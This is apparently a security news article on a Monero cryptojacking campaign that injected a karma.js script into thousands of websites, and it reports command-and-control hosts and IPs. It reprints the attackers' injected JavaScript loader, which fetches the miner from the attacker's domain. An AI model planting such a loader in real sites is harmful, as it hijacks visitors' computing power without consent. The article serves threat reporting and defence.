New Wave of Crypto-Hijacking Infects 3,500+ Websites

New Wave of Crypto-Hijacking Infects 3,500+ Websites

A stealth Monero-mining campaign has quietly compromised more than 3,500 websites by embedding an innocuous-looking JavaScript file called karma.js.

The operation leverages WebAssembly, Web Workers, and WebSockets to siphon CPU cycles while keeping resource usage low enough to avoid user suspicion.

Cside.dev analysts first noted the anomaly after routine crawlers flagged an obfuscated script delivered via trustisimportant.fun that immediately redirected to yobox.store.

Google News

The team observed no initial network calls or CPU spikes, yet heuristic analysis classified the payload as malicious, prompting a deeper teardown.

Unpacking the code revealed a command-and-control channel at wss://lokilokitwo.de:10006, hard-coded fallback IPs 89.58.14.251 and 104.21.80.1, and a penchant for recycling infrastructure previously linked to Magecart card-skimming crews.

By throttling hash intensity and distributing work across background threads, the miner maintains a near-invisible footprint even on mobile devices.

This marks a resurgence of browser-based cryptojacking, once thought defunct after Coinhive’s 2019 demise, but now refined to evade both ad-blocker blacklists and built-in browser mining defenses.

New Wave of Crypto-Hijacking Infects 3,500+ Websites
Nonsensical nosaj=faster.mo query (Source – Cside.dev)

Victims experience only marginal latency, extending dwell time and cumulative profit for attackers. This shows the base64-encoded loader that starts the chain.

Stealth Infection Mechanism

The infection begins with a single-line data URI injected into a legitimate page, often through compromised third-party widgets or outdated CMS plug-ins.

Once executed, the stub dynamically loads the real miner, assigns a random element ID to avoid duplication checks, and hooks an onload handler that launches the EverythingIsLife() bootstrap routine.

(function(d,s,id){
  if(d.getElementById(id)) return;
  const js=d.createElement(s);js.id=id;
  js.src="https://trustisimportant.fun/karma/karma.js?karma=bs";
  d.getElementsByTagName(s)[0].parentNode.insertBefore(js, s);
})(document,'script','backup-jss');

Inside karma.js, a capability probe tests navigator.hardwareConcurrency and WebAssembly before spawning several workers that fetch hashes via WebSocket and return results in near-real-time.

Limiting CPU load to roughly 20% hides anomalies, demanding runtime script-integrity defenses.

Boost detection, reduce alert fatigue, accelerate response; all with an interactive sandbox built for security teams -> Try ANY.RUN Now


Source link